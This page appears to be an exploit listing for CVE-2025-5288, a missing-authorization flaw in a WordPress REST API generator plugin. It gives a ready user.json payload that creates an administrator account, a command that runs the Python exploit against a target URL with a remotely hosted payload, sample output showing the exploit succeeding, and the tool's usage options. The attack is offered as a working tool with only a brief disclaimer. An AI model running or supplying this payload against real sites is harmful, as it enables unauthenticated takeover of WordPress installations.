Share
## https://sploitus.com/exploit?id=574179BD-E26C-5F1A-88D7-2BDA0FB41183
# 🚨 REST API | Custom API Generator For Cross Platform And Import Export In WP 1.0.0 - 2.0.3 - Missing Authorization to Unauthenticated Privilege Escalation
## 📋 Description
The **REST API | Custom API Generator For Cross Platform And Import Export In WP** plugin for WordPress is vulnerable to **Privilege Escalation** due to a missing capability check on the `process_handler()` function in versions `1.0.0 to 2.0.3`.
This allows **unauthenticated attackers** to send a specially crafted `user.json` file to an exposed endpoint and create a new **Administrator** account.
- **CVE:** CVE-2025-5288
- **CVSS Score:** 9.8 (Critical)
- **Published:** June 12, 2025
- **Last Updated:** June 12, 2025
---
## ⚙️ Script Explanation
### user.json Payload Format:
```json
[
{
"author_data": {
"post_author": "Nxploited",
"post_author_email": "NxploitBot@gmal.com",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
]
```
---
## 🚀 Exploitation Flow:
```bash
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json
```
### Sample Output:
```
[+] Target appears vulnerable (version: 2.0.3) - exploiting...
[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:
[1] {
"author_data": {
"post_author": "Nxploited",
"post_author_email": "NxploitBot@gmal.com",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
[*] Launching exploitation...
[+] Exploit delivered successfully.
[+] Payload Sent:
[
{
"author_data": {
"post_author": "Nxploited",
"post_author_email": "NxploitBot@gmal.com",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
]
```
---
## 🧰 Usage
```
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]
Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site (e.g., http://target/wp/)
-json, --url_json URL_JSON
URL to hosted R.json payload
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--timeout TIMEOUT HTTP timeout in seconds (default: 10)
--no-verify Disable SSL certificate verification (NOT recommended!)
--no-sleep Disable sleep delays for faster execution
--debug Enable debug output
```
---
## ⚠️ Disclaimer
This tool is for educational and authorized security research purposes only. Unauthorized access to systems without permission is illegal.
---
*By: Nxploited (Khaled_alenazi)*